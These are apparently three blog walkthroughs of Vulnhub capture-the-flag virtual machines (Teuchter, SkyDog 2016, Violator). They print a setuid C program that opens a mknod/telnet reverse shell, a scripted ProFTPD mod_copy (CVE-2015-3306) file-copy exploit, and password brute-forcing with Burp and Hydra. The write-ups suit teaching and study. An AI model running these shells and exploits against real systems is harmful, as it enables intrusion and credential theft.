When knightmare asked me to test his latest boot2root based around Scottish culture/slang I jumped at the opportunity. Having chatted quite a bit and debugged issues on other VMs, I had already picked up several colorful Scottish expressions, but boy was I in for a ride!

Gaun yersel!!!


You can grab the VM here: https://www.vulnhub.com/entry/teuchter-03,163/

As always I imported the VM and fired off an nmap scan. This one only gave me port 80 to work with.

Hitting the web server I was greeted by Willie from the Simpsons telling me to stay out of his server, we’ll see about that.

I checked the page source and noted down several hints including possible usernames and directories.

Images will open doors. Perhaps some stego or exif madness? I grabbed all the images down locally to have a look.

Amazing shot!

Well, the ‘flicks’ directory was forbidden:

…and the ‘telly’ directory gave me more clues (and confusion):

More hints. At this point my head was spinning!


Focusing on the phpinfo hint I tried browsing to /flicks/phpinfo.php but that would be too easy. Firing off Burp intruder with a list of known file extensions finally got me a hit for phpinfo.pht. Nice troll.

The clue about images opening doors made me think I was looking for some sort of backdoor. I re-scanned to see if any additional ports had opened.  Googling for “php backdoors” gave me this link as the first hit: https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html.

Sure enough I was able to use this technique to gain command execution:

I uploaded a PHP reverse shell but could not get it working (I’d come to find out why later on).

Turning to this great reverse shell cheat sheet, I decided to use the trusty mknod technique to fire myself a reverse shell.

Ok, now we’re in as www-data:

I was stuck here for quite some time. After much enumeration I took a look for SUID files and came up with a txt file in the /home/proclaimers directory, which was strange.

The file talked about wildcards. Possible privilege escalation?

Some more enumeration turned up a hint in the login.txt file, alluding to a password hidden within an image file. I had already checked out every image though!

Well, in this case knightmare was being literal and the password was right in front of me, in the form of the filename.

Once I switched over to the jkerr user I looked around quite a bit but did not find anything useful. Taking a look at the list of users I decided to Google for who cpgrogan could be.

Based on this Wikipedia article, Clare Grogan was best known as the lead singer of the band 'Altered Images'. After bouncing my head off the keyboard for some time, once again I had another password.

Once switched over to the cpgrogan user I was able to browse around the home directory and found yet another reference to wild cards.

At this point I needed to gain access as one more user, ‘proclaimers’. There were a few images left and the comment ‘images open doors’ was still burned in my mind so I pulled them down via Python 3 http.server (which btw I had to use because Knightmare removed the Python2 binary… thanks for that one 🙂 )

The 'promisedyouamiracle' image appeared to have an interesting base64 encoded string in the exif data.

The string decoded to ‘gemini’. C’mon password!

It worked! OK! Now I was in as theproclaimers, what was the next step?

Looking around forever I landed on an interesting shell script 'numpties.sh'. The script showed why I had trouble with my PHP reverse shell as well as why I couldn't use wget to upload anything, haha. It shows us that any file named 'semaphore' placed in the /home/proclaimers/letterfromamerica directory would have its ownership changed to root and the SUID bit set. Smells like privilege escalation. I also assumed that the shell script must be running on a cron job.

At this point I needed a simple binary that, once compiled and once the cron job had changed its ownership and permissions, could be leveraged to fire me a root shell.

This simple program did the job:

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main()
{
  /* Once the cron job has chowned the binary to root and set the SUID bit,
     setuid(0) makes root the real uid for the command that follows. */
  setuid( 0 );
  /* Same mknod/telnet back-pipe technique used earlier for the www-data shell. */
  system( "mknod backpipe p; telnet 192.168.110.175 443 0<backpipe | /bin/bash 1>backpipe" );
  return 0;
}

I compiled it locally and pulled it over with curl, since wget was unusable thanks to knightmare's trolling.

I started up a netcat listener and waited. Not too long after I had a hit and had a root shell! Well, we all know by now that knightmare’s VMs are not over with root and this one was no exception! Onwards to the final flag…and on and on and on. More trolling, I was sweating by this time.
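The cron job is a privilege escalation path because a root-owned setuid file appears under a home directory, where setuid files never belong. As an added example (mine, not part of the VM or this write-up), here is a baseline-diff scanner in Python: it walks a tree, collects regular files carrying the setuid or setgid bit, and reports any that are not in a known-good list. The tree it scans, including the file named semaphore, is constructed in a temporary directory.

```python
import os
import stat
import tempfile


def find_setuid_files(root):
    """Walk `root` without following symlinks and return a sorted list of
    (path, owner_uid, bits) for regular files with the setuid/setgid bit set;
    bits is "u", "g" or "ug"."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable: skip rather than abort the scan
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                bits = "".join(
                    label for label, flag in (("u", stat.S_ISUID), ("g", stat.S_ISGID))
                    if st.st_mode & flag
                )
                hits.append((path, st.st_uid, bits))
    return sorted(hits)


def new_setuid_files(hits, baseline):
    """Return the hits whose path is not in `baseline`, a set of paths from an
    earlier scan of the same tree (the known-good setuid inventory)."""
    return [h for h in hits if h[0] not in baseline]


def demo():
    """Constructed tree: one ordinary file plus a setuid 'semaphore', mirroring
    the VM's /home/proclaimers/letterfromamerica directory. Returns the hits
    not covered by an empty baseline, with paths relative to the temp root."""
    with tempfile.TemporaryDirectory() as root:
        home = os.path.join(root, "proclaimers", "letterfromamerica")
        os.makedirs(home)
        for name, mode in (("notes.txt", 0o644), ("semaphore", 0o4755)):
            path = os.path.join(home, name)
            with open(path, "w") as fh:
                fh.write("constructed\n")
            os.chmod(path, mode)
        hits = find_setuid_files(root)
        unexpected = new_setuid_files(hits, baseline=set())
        return [(os.path.relpath(p, root), bits) for p, _uid, bits in unexpected]


if __name__ == "__main__":
    for rel, bits in demo():
        print("unexpected setuid/setgid file:", rel, bits)
```

In practice the baseline is the path set from a scan taken at build time; run periodically over /home, /tmp and /var the diff is empty on a healthy host, and a cron job like numpties.sh shows up the first time it fires.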

Eventually I got to the bottom of the rabbit hole and found a zip file with what I could only imagine would be a disk image inside.

Of course the zip was password protected and nothing worked. I went back and made a word list from everything I had seen so far. Nada! Eventually, out of sheer desperation, I tried 'Teuchter' and immediately wanted to strangle knightmare through the screen.

The zip contained a virtual disk image. I tried to mount it, cut it up with strings and binwalk but nothing worked. Exploring a bit more with my shiny new root privileges gave me another hint within the crontabs file:

## So vmfs-tools package eh....?
*/5 * * * * /bin/sh /usr/local/bin/numpties.sh > /dev/null 2>&1

Some Googling showed me I could mount the disk image as a new drive and use the vmfs-tools package to explore it. I added the image as a new drive under sda2:

root@mrb3n:~/Desktop/teuch# fdisk -l

Disk /dev/sda: 30 GiB, 32212254720 bytes, 62914560 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xb2d1b90f

Device     Boot    Start      End  Sectors  Size Id Type
/dev/sda1  *        2048 60262399 60260352 28.8G 83 Linux
/dev/sda2       60264446 62912511  2648066  1.3G  5 Extended
/dev/sda5       60264448 62912511  2648064  1.3G 82 Linux swap / Solaris

I then used vmfs-fuse to mount the drive and explore it:

root@mrb3n:~/Desktop/teuch# vmfs-fuse /dev/sdb1 /mnt/teuch

root@mrb3n:~/Desktop/teuch# cd /mnt/teuch/

Red Kola? Irn Bru? More hints!

Almost there.. Check the ISO and remember password relates to the TV Advert you watched.

I took out the spaces but it’s 25 characters but the Wikipedia page will get it for you.

This was either another troll or knightmare was showing some mercy. From all the hints I was guessing the final flag was hidden inside the glass_ch.jpg image. I could probably pull it out with steghide but I still needed a 25 character password. After going back to the beginning and reviewing everything I had, once again I came up with 'madeinscotlandfromgirders' as the password.

I copied the image file over to a Windows VM where I had steghide from a previous CTF and FINALLY had the “real” flag after so many “almosts”.

This was an awesome VM, a mixture of entertaining and extremely frustrating. I learned a bunch about Scottish culture and could finally decode some of the things knightmare was saying.

Thanks to knightmare for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

This glossary of Scottish slang and Jargon also came in handy: https://en.wiktionary.org/wiki/Appendix:Glossary_of_Scottish_slang_and_jargon#G

SkyDog 2016: Catch Me If You Can Vulnhub Walkthrough

A new VM was released on Vulnhub this week. I had some downtime at night while traveling for work so I grabbed the image and got to work.

https://www.vulnhub.com/entry/skydog-2016-catch-me-if-you-can,166/

The challenge is set up with 8 flags as follows:

Flag#1 – “Don’t go Home Frank! There’s a Hex on Your House”
Flag#2 – “Obscurity or Security? That is the Question”
Flag#3 – “During his Travels Frank has Been Known to Intercept Traffic”
Flag#4 – “A Good Agent is Hard to Find”
Flag#5 – “The Devil is in the Details – Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices”
Flag#6 – “Where in the World is Frank?”
Flag#7 – “Frank Was Caught on Camera Cashing Checks and Yelling – I’m The Fastest Man Alive!”
Flag#8 – “Franks Lost His Mind or Maybe it’s His Memory. He’s Locked Himself Inside the Building. Find the Code to Unlock the Door Before He Gets Himself Killed!”

I always enjoy challenges like this with multiple flags as it helps to keep you going/on path.

I started off with an nmap scan to see what we were dealing with:

root@kali:~# nmap -A -p- -Pn --open -T4 172.16.94.136

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-11-11 09:08 EST
Nmap scan report for 172.16.94.136
Host is up (0.00039s latency).
Not shown: 65531 filtered ports, 1 closed port
PORT      STATE SERVICE  VERSION
80/tcp    open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
443/tcp   open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: SkyDog Con CTF 2016 - Catch Me If You Can
| ssl-cert: Subject: commonName=Network Solutions EV Server CA 2/organizationName=Network Solutions L.L.C./stateOrProvinceName=VA/countryName=US
| Not valid before: 2016-09-21T14:51:57
|_Not valid after:  2017-09-21T14:51:57
|_ssl-date: TLS randomness does not represent time
22222/tcp open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:64:7c:d1:55:46:4e:50:e3:ba:cf:4c:1e:81:f9:db (RSA)
|_  256 ef:17:df:cc:db:2e:c5:24:e3:9e:25:16:3d:25:68:35 (ECDSA)
MAC Address: 00:0C:29:14:57:58 (VMware)
Device type: general purpose|phone|WAP|specialized|storage-misc

A web server listening on port 80 and 443 as well as an SSH service on a non-standard port.

I went a bit out of order with the flags so the clues do not match up exactly. I checked out the SSH service first and the banner gave up a flag.

root@kali:~# ssh 172.16.94.136 -p 22222
The authenticity of host '[172.16.94.136]:22222 ([172.16.94.136]:22222)' can't be established.
ECDSA key fingerprint is SHA256:DeCMZ74o5wesBHFLyaVY7UTCA7mW+bx6WroHm6AgMqU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[172.16.94.136]:22222' (ECDSA) to the list of known hosts.
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
root@172.16.94.136's password:

The flag was the MD5 of the word ‘encrypt’.

I spun my wheels for a while on the next flag. After running Burp and Dirbuster for a while and not coming up with anything new, I decided to go file by file. One of the JavaScript files had an interesting comment, in hex, which was one of the clues.

root@kali:~# curl -s http://172.16.94.136/oldIE/html5.js
/* 666c61677b37633031333230373061306566373164353432363633653964633166356465657d */
/*! HTML5 Shiv v3.6 | @afarkas @jdalton @jon_neal @rem | MIT/GPL2 Licensed */
/* Source: https://github.com/aFarkas/html5shiv — No longer maintained */
.......................snip......................

Decoding the Hex with Python gave me the next flag, which was the MD5 of ‘nmap’ which must be the hint for the SSH banner flag.

root@kali:~# python
Python 2.7.12+ (default, Sep  1 2016, 20:27:38) 
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b37633031333230373061306566373164353432363633653964633166356465657d".decode('hex')
'flag{7c0132070a0ef71d542663e9dc1f5dee}'
>>>

Dirbuster turned up a protected page. Browsing to it gave me an error message. My first thought was changing my user-agent. I first attempted with Burp Intruder and a large user-agent list but did not get any hits.

root@kali:~# curl -s http://172.16.94.136/personnel
ACCESS DENIED!!! You Do Not Appear To Be Coming From An FBI Workstation. Preparing Interrogation Room 1. Car Batteries Charging....

Digging around for quite some time led me back to the same JavaScript file with some more interesting comments. The FBI page was expecting my UA to be IE 4.0. Super secure!

Changing my UA to IE 4.0 in Burp Repeater got me access to the FBI Portal page.

I set up a match/replace rule in Burp to make it easier to browse the site directly.


The FBI Portal page was all static content, but I did get the next flag (which cracked to ‘evidence’) as well as a clue “new+flag”.

Following the hint brought me to a password protected page.

Basic-auth can be brute-forced with Burp Intruder but I first needed a username. The JavaScript file from earlier gave us a user name and the login prompt states “FBI Personnel” so I followed the username format and configured Intruder to attempt a brute-force with the user ‘carl.hanratty’.

I set up Burp like so:

The username in position 1 with a ':' separator, and base64 encoding to properly format the payloads for basic-auth.

I used a large wordlist and eventually got a hit; the 301 redirect indicated a successful login.

I checked the string for the valid password.

root@kali:/# echo Y2FybC5oYW5yYXR0eTpHcmFjZQ== | base64 -d
carl.hanratty:Grace

I was greeted with an FBI evidence page which gave me my next flag (which cracked to ‘panam’).

As well as a PDF document that did not yield anything upon inspection.


As with all CTFs, I have gotten in the habit of checking images for hidden data with strings, exiftool, steghide, binwalk, etc. Running binwalk against this image file indicated the presence of something embedded. I attempted to carve it up for a while and didn’t get anywhere.

root@kali:~/Desktop/skyconCTF# binwalk -e image.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
2214320       0x21C9B0        MySQL MISAM compressed data file Version 10

I took a stab with steghide but did not have the passphrase. I eventually had a facepalm moment when trying 'panam'. I extracted the flag.txt file and had the next flag as well as what appeared to be 2 passwords. But for what? It had to be the SSH service, as the rest of the web application appeared static, but I did not have a user name.

root@kali:~/Desktop/skyconCTF# steghide extract -sf image.jpg -p panam
wrote extracted data to "flag.txt".
root@kali:~/Desktop/skyconCTF# cat flag.txt 
flag{d1e5146b171928731385eb7ea38c37b8}
=ILoveFrance

clue=iheartbrenda

Google showed that the ‘fastest man alive’ clue was potentially talking about the Flash, also known as Barry Allen. Google further turned up that Barry Allen was an alias used by Frank Abagnale in the movie to trick the FBI agent tracking him. I put together a list of potential usernames based on all the aliases I could find from the movie and tried various formats.

frank.conners
frank.abagnale
barry.allen
frankconners
frankabagnale
fconners
ballen
frankconners
frankabagnale
barryallen

Trying each of these usernames combined with 'ILoveFrance' and 'iheartbrenda' eventually got me a successful login: barryallen:iheartbrenda. Logging in got me the next flag.

root@kali:~/Desktop/skyconCTF# ssh barryallen@172.16.94.136 -p 22222
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
barryallen@172.16.94.136's password: 
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-38-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

14 packages can be updated.
7 updates are security updates.

/usr/bin/xauth:  file /home/barryallen/.Xauthority does not exist
barryallen@skydogconctf2016:~$ 


barryallen@skydogconctf2016:~$ ls
flag.txt  security-system.data
barryallen@skydogconctf2016:~$ cat flag.txt 
flag{bd2f6a1d5242c962a05619c56fa47ba6}

This MD5 cracked to ‘theflash’.

There was also a large zip file in the user’s home directory which I transferred off using SCP to work on locally.

barryallen@skydogconctf2016:~$ file security-system.data 
security-system.data: Zip archive data, at least v2.0 to extract


root@kali:~/Desktop/skyconCTF# scp -P 22222 barryallen@172.16.94.136:/home/barryallen/security-system.data /root/Desktop/skyconCTF
###############################################################
#                         WARNING                             #
#		FBI - Authorized access only!                 # 
# Disconnect IMMEDIATELY if you are not an authorized user!!! #
#         All actions Will be monitored and recorded          #
#	Flag{53c82eba31f6d416f331de9162ebe997}		      #
###############################################################
barryallen@172.16.94.136's password: 
security-system.data                          100%   71MB  80.0MB/s   00:00

I unzipped the file and ran it through binwalk (which ended up crashing my VM due to the size), whoops.

root@kali:~/Desktop/skyconCTF# unzip security-system.data.zip 
Archive:  security-system.data.zip
  inflating: security-system.data 

root@kali:~/Desktop/skyconCTF# binwalk -e security-system.data

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
150720        0x24CC0         Microsoft executable, portable (PE)
656418        0xA0422         Copyright string: "Copyright 1985-1998,Phoenix Technologies Ltd.All rights reserved."
819330        0xC8082         Copyright string: "Copyright (C) 2003-2014  VMware, Inc."
819369        0xC80A9         Copyright string: "Copyright (C) 1997-2000  Intel Corporation"
985388        0xF092C         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."
996673        0xF3541         Copyright string: "Copyright 2000-2015 VMware, Inc."
1000211       0xF4313         Copyright string: "Copyright 1985-2001 Phoenix Technologies Ltd."
5074944       0x4D7000        Microsoft executable, portable (PE)
5894224       0x59F050        Copyright string: "Copyright (C) Rational Systems, Inc."
6758664       0x672108        CRC32 polynomial table, little endian
7143424       0x6D0000        Microsoft executable, portable (PE)
17394939      0x1096CFB       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
19261011      0x125E653       mcrypt 2.2 encrypted data, algorithm: blowfish-448, mode: CBC, keymode: 8bit
.......................snip......................

The file appeared to be a memory dump. I haven’t done much forensics so I turned to Google and came up with Volatility on Kali, which seems to be a go-to for analyzing memory dumps.

I got started with this guide: http://resources.infosecinstitute.com/memory-forensics-and-analysis-using-volatility/

I first had to check the image info to figure out the operating system the dump came from and set up a profile moving forward.

root@kali:~/Desktop/skyconCTF# volatility imageinfo -f security-system.data 
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)
                     AS Layer2 : FileAddressSpace (/root/Desktop/skyconCTF/security-system.data)
                      PAE type : PAE
                           DTB : 0x33e000L
                          KDBG : 0x80545b60L
          Number of Processors : 1
     Image Type (Service Pack) : 3
                KPCR for CPU 0 : 0xffdff000L
             KUSER_SHARED_DATA : 0xffdf0000L
           Image date and time : 2016-10-10 22:00:50 UTC+0000
     Image local date and time : 2016-10-10 18:00:50 -0400

I next used the ‘filescan’ plugin and dumped out all the file names.

root@kali:~/Desktop/skyconCTF# volatility --profile=WinXPSP2x86 -f security-system.data filescan > files
Volatility Foundation Volatility Framework 2.5
root@kali:~/Desktop/skyconCTF# cat files | grep flag.txt 
root@kali:~/Desktop/skyconCTF# cat files | grep flag
root@kali:~/Desktop/skyconCTF# cat files | grep .txt
0x0000000005e612f8      1      0 -W-r-- \Device\HarddiskVolume1\Documents and Settings\test\Desktop\code.txt
0x0000000

I grepped for ‘flag.txt’, ‘flag’ and just ‘.txt’ until I got several hits. code.txt looked particularly promising. Looking at the plugin list I noticed one for checking command line history, cmdscan. Running it got me another hex string.

root@kali:~/Desktop/skyconCTF# volatility --profile=WinXPSP2x86 -f security-system.data cmdscan
Volatility Foundation Volatility Framework 2.5
**************************************************
CommandProcess: csrss.exe Pid: 560
CommandHistory: 0x10186f8 Application: cmd.exe Flags: Allocated, Reset
CommandCount: 2 LastAdded: 1 LastDisplayed: 1
FirstCommand: 0 CommandCountMax: 50
ProcessHandle: 0x2d4
Cmd #0 @ 0x1024400: cd Desktop
Cmd #1 @ 0x4f2660: echo 66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d > code.txt

Once again I was able to use Python to decode the Hex and grab the last flag.

root@kali:~/Desktop/skyconCTF# python
Python 2.7.12+ (default, Sep  1 2016, 20:27:38) 
[GCC 6.2.0 20160822] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> "666c61677b38343164643364623239623066626264383963376235626537363863646338317d".decode('hex')
'flag{841dd3db29b0fbbd89c7b5be768cdc81}'
>>> 

Flag 3 kept me stumped. I ran Wireshark and Ettercap for a while since it seemed to allude to traffic sniffing, but no luck. I dug around the file system for a while and did not notice any services calling out. Eventually I took a look at the Apache configuration and found flag3 hidden inside the apache.crt file.

I decoded the base64 in Burp which gave me the MD5 of ‘personnel’. Luckily I found that page with Dirbuster or I would have been quite stuck.

This was a fun challenge and I got to play around with forensics tools a bit. I spent quite some time going through the memory dump with Volatility afterwards, really cool stuff.

Thanks to @jamesbower for putting this challenge together as well as @g0tmi1k and the @vulnhub team for continuing to maintain this community.

Violator vulnhub VM walkthrough


A while back knightmare asked me to test his boot2root challenge named Violator. Having thoroughly enjoyed his first three, Droopy, Gibson and Sidney, I jumped at the opportunity.

Like his other VMs it had a theme, this one being Depeche Mode themed.

You can grab a copy for yourself here: https://www.vulnhub.com/entry/violator-1,153/

When testing a boot2root I typically approach it as any other challenge, only stopping along the way if I feel I discover a flaw/unintended path, something appears to be broken or I just 100% hit a wall.

Knightmare provided me with the following hints to get going (I’ve also learned by now to set the HDD on all his VMs to non-persistent 🙂 ) :

  • Vince Clarke can help you with the Fast Fashion.
  • The challenge isn’t over with root. The flag is something special.
  • I have put a few trolls in, but only to sport with you.

Without further ado, here goes:

As always, we start off with a quick nmap scan. This one turns up an FTP service and Apache web server.

root@mrb3n:/# nmap -sV 192.168.110.183

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-09-16 10:13 EDT
Nmap scan report for 192.168.110.183
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5rc3
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 00:0C:29:7D:C7:3C (VMware)
Service Info: OS: Unix

The web server is pretty sparse. There is an image of Foghorn Leghorn from Looney Tunes as well as a link to a Wikipedia page about the Depeche Mode album ‘Violator’, which I can only assume is a hint for later.

root@mrb3n:~# curl -s http://192.168.110.183
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
  <body>
    <br>I Say.. I say... I say boy!  You're barkin up the wrong tree!</br>
    <img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
   <-- https://en.wikipedia.org/wiki/Violator_(album)  -->
  </body>
</html>

I pulled down the image and checked it with exiftool but did not find any hidden treasures.

Leaving the web server aside and taking a look at the FTP service banner, I find a ProFTPD 1.3.5 File Copy exploit over on exploit-db. Maybe I can use this to pull down something interesting?

I attempt to connect anonymously and get rejected, so let’s try out this exploit (CVE-2015-3306). If successful, I will be able to use the mod_copy module’s SITE CPFR/SITE CPTO commands to read and write files on the server without ever authenticating.

root@mrb3n:~# ftp 192.168.110.183
Connected to 192.168.110.183.
220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183]
Name (192.168.110.183:root): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

I go after /etc/passwd first.

ftp> site CPFR /etc/passwd
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/passwd
250 Copy successful
ftp>

Awesome! The web root is writable and I was able to grab a list of usernames.
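The same CPFR/CPTO exchange, scripted. This is an added example and not part of the original write-up or of ProFTPD: the client half is what you would point at a real 1.3.5 server, while the server half is a constructed stand-in that answers the way the vulnerable build does (350 to CPFR, 250 to CPTO, and all of it before any USER/PASS), so the whole thing runs offline. The pretend filesystem contents and the hostnames in the banner are made up; the reply texts match what the real server printed above.

```python
import ftplib
import socketserver
import threading


class FakeModCopyFTP(socketserver.StreamRequestHandler):
    """Constructed stand-in for a ProFTPD 1.3.5 mod_copy server: it honours
    SITE CPFR/CPTO before any login, which is the whole bug (CVE-2015-3306).
    `fs` is a pretend filesystem; CPTO writes into it so the copy is checkable."""

    fs = {"/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                         "dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash\n"}

    def handle(self):
        self.reply("220 ProFTPD 1.3.5rc3 Server (constructed fake) [127.0.0.1]")
        pending = None                      # path named by the last good CPFR
        for raw in self.rfile:
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "QUIT":
                self.reply("221 Goodbye.")
                return
            if verb != "SITE":
                self.reply("530 Please login with USER and PASS")
                continue
            sub, _, path = arg.partition(" ")
            sub = sub.upper()
            if sub == "CPFR":
                if path in self.fs:
                    pending = path
                    self.reply("350 File or directory exists, ready for destination name")
                else:
                    self.reply("550 %s: No such file or directory" % path)
            elif sub == "CPTO":
                if pending is None:
                    self.reply("503 Bad sequence of commands")
                else:
                    self.fs[path] = self.fs[pending]
                    pending = None
                    self.reply("250 Copy successful")
            else:
                self.reply("500 'SITE %s' not understood" % sub)

    def reply(self, line):
        self.wfile.write((line + "\r\n").encode())


def modcopy_copy(host, port, src, dst, timeout=5):
    """Copy src to dst on the target with SITE CPFR/CPTO, without logging in.
    Returns (True, replies) on success or (False, replies) as soon as the
    server refuses a step; replies holds the raw server lines seen."""
    ftp = ftplib.FTP()
    replies = []
    try:
        ftp.connect(host, port, timeout=timeout)
        for cmd, want in (("SITE CPFR " + src, "350"), ("SITE CPTO " + dst, "250")):
            try:
                resp = ftp.sendcmd(cmd)     # raises error_perm on a 5xx reply
            except ftplib.all_errors as exc:
                replies.append(str(exc))
                return False, replies
            replies.append(resp)
            if not resp.startswith(want):
                return False, replies
        return True, replies
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()


def serve_fake():
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeModCopyFTP)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo():
    """One copy that works (like /etc/passwd above) and one the server refuses."""
    srv = serve_fake()
    host, port = srv.server_address
    try:
        good = modcopy_copy(host, port, "/etc/passwd", "/var/www/html/passwd")
        bad = modcopy_copy(host, port, "/etc/shadow", "/var/www/html/shadow")
    finally:
        srv.shutdown()
        srv.server_close()
    return good, bad, FakeModCopyFTP.fs.get("/var/www/html/passwd")


if __name__ == "__main__":
    good, bad, copied = demo()
    print(good, bad, sep="\n")
    print(copied, end="")
```

Against a real target you would call modcopy_copy with the box’s address and port 21 and then fetch the destination over HTTP exactly as above; the 550 branch is what the refused /etc/shadow attempt looks like from the client side.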

root@mrb3n:~# curl -s http://192.168.110.183/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
proftpd:x:104:65534::/var/run/proftpd:/bin/false
ftp:x:105:65534::/srv/ftp:/bin/false
mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash

So here we have a list of local usernames, which happen to be the members of Depeche Mode. I attempted to grab /etc/shadow but was denied. I grabbed the group file to see what permissions each user has on the target system.

ftp> site CPFR /etc/group
350 File or directory exists, ready for destination name
ftp> site CPTO /var/www/html/group
250 Copy successful

root@mrb3n:~/violator# curl -s http://192.168.110.183/group > group
root@mrb3n:~/violator# cat group | grep sudo
sudo:x:27:dg

The user dg is in the sudo group so hopefully we can get his creds somehow! At this point I figured I needed some sort of wordlist. The Wikipedia page linked in the index page source seems like a good candidate. Firing up Cewl I put together a quick wordlist.

root@mrb3n:~/violator# cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt

This wordlist didn’t get me anywhere. After some fumbling around with various combinations I settled on a wordlist with all of the song titles, lowercase, without spaces or special characters. First we remove all spaces.

root@mrb3n:~/violator# sed 's/ //g' violator > violator_nospaces

We can clean things up a bit more with cut and tr.

root@mrb3n:~/violator# cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > violator_list
root@mrb3n:~/violator# cat violator_list 
worldinmyeyes
sweetestperfection
personaljesus
halo
waitingforthenight
enjoythesilence
policyoftruth
bluedress
clean
dangerous
memphisto
sibeling
kaleid
happiestgirl
seaofsin
enjoythesilence
enjoythesilence
enjoythesilence
sibeling
enjoythesilence
enjoythesilence
enjoythesilence
memphisto

Interestingly enough, Hydra finds valid passwords for all 4 users. dg is my target so let’s check his account first.

root@mrb3n:~/violator# hydra -L users -P violator_list ftp://192.168.110.183
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-16 14:00:35
